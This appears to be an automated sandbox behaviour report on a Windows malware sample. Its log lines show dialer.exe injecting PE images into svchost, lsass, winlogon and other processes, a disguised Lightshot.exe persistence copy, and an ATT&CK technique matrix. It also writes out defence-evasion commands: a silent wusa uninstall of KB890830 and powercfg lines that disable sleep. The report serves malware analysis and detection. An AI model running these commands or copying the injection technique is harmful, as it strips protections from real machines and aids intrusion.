          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DBFA540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: 3340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844140000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 228CA7E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 228B3E20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EDA6AC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 15519600000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 185BB560000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 17F327F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 197F36A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1C019C80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1C01A710000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exe | Memory written: PID: 1028 base: 3340000 value: 4D
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe | Thread register set: target process: 1276
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Thread register set: target process: 7056
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Thread register set: target process: 2284
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Thread register set: target process: 4508
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DD590000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160C9E0000
          Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140AE890000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DE1A0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CA10000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 257E1070000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 254A27A0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A205670000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26238950000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2786E560000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B279570000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22D13110000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C782530000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: A60000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A142790000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DC90000
          Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844140000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 228CA7E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 228B3E20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EDA6AC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15519600000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 185BB560000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 17F327F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 197F36A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1C019C80000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1C01A710000
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 25_2_0000000140001B54
          Source: winlogon.exe, 0000001F.00000000.2071908099.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.3286399434.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.2084584090.0000011605AB4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
          Source: winlogon.exe, 0000001F.00000000.2071908099.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.3286399434.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000002.3296482195.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 0000001F.00000000.2071908099.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.3286399434.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000002.3296482195.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: winlogon.exe, 0000001F.00000000.2071908099.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.3286399434.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000002.3296482195.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E8589636F0 cpuid 31_2_000001E8589636F0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\winlogon.exe | Code function: 31_2_000001E858987960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 31_2_000001E858987960
          Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Users\user\Desktop\nW2oopMIdg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\nW2oopMIdg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: dialer.exe, 00000041.00000003.2138482082.000001C3772F2000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3283235144.000001C3772F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
          MITRE ATT&CK matrix (the number in parentheses is the count the report shows next to a technique; techniques without a number were not observed for this sample):

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (11) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | Credential API Hooking (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | Native API (2) | Windows Service (11) | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | File and Directory Discovery (1) | Remote Desktop Protocol | Credential API Hooking (1) | Non-Application Layer Protocol (1) | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | Service Execution (1) | Logon Script (Windows) | Windows Service (11) | Obfuscated Files or Information (2) | Security Account Manager | System Information Discovery (24) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (1) | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Process Injection (713) | Install Root Certificate (1) | NTDS | Security Software Discovery (441) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Process Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | File Deletion (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (131) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Rootkit (4) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Masquerading (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Modify Registry (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Virtualization/Sandbox Evasion (131) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
          Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Access Token Manipulation (1) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
          Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Process Injection (713) | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
